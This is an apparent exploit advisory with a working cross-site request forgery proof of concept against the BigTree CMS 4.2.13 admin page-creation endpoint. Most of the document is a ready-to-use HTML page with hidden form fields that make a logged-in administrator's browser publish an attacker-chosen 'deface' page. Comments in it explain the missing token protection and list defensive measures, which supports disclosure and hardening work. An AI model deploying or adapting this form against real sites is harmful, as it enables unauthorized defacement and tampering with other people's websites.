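BigTree CMS version 4.2.13 suffers from a cross-site request forgery (CSRF) vulnerability: the admin page-creation request (/admin/pages/create/) can be forged, as the proof of concept below shows.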
85a2cfd2a1bc40c7a4881a325ba67c796d3788fdcc55f5821e62f64dd87ed4b8
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit Title : bigtree cms CSRF Exploit
-# Author : Ashiyane Digital Security Team
-# Vendor Homepage: https://www.bigtreecms.org/
-# Software Link:
-# https://www.bigtreecms.org/ajax/download-installer/?installer=53
-# Version : 4.2.13
-# Date: 26-10-2016
-# Tested On : Windows 7 / FireFox
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
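<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Add page CSRF Exploit</title>
</head>
<body>
  <!--
    Proof of concept for the CSRF issue reported against BigTree CMS 4.2.13.

    What it demonstrates: the admin "create page" request is built entirely
    from values that are constant and known in advance. Nothing in the form
    is tied to the administrator's session, so a page on another origin can
    issue the same POST and the browser attaches the admin session cookie.

    Review notes for defenders:
      * State-changing admin endpoints should require an unpredictable,
        per-session (or per-request) anti-CSRF token, validated server-side.
      * Setting SameSite on the admin session cookie and checking the
        Origin / Referer headers on POST requests are additional layers.
      * In web server logs, POST requests to /admin/pages/create/ whose
        Origin or Referer is not the site itself are worth alerting on.
  -->
  <h2>Add page CSRF Exploit</h2>
  <form action="http://localhost/admin/pages/create/" method="post">
    <!--
      NOTE(review): this field carries the fixed literal "success". It looks
      like a marker that the POST body arrived, not a secret token, so it
      offers no CSRF protection. Confirm against the BigTree source.
    -->
    <input type="hidden" name="_bigtree_post_check" value="success">
    <!-- Page placement and navigation fields: all attacker-chosen constants. -->
    <input type="hidden" name="parent" value="0">
    <input type="hidden" name="nav_title" value="deface">
    <input type="hidden" name="title" value="deface page title">
    <input type="hidden" name="in_nav" value="on">
    <input type="hidden" name="template" value="content">
    <!-- Page body fields for the selected template. -->
    <input type="hidden" name="resources[page_header]" value="page header">
    <input type="hidden" name="resources[page_content]" value="deface text">
    <!-- The ampersand is escaped in markup; the submitted value is unchanged. -->
    <input type="submit" name="ptype" value="Create &amp; Publish">
  </form>
</body>
</html>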
-#-# Path of the page created by the request: http://localhost/deface/
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-# Discovered by : Amir.ght -#-#
#-# Author : Ashiyane Digital Security Team -#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#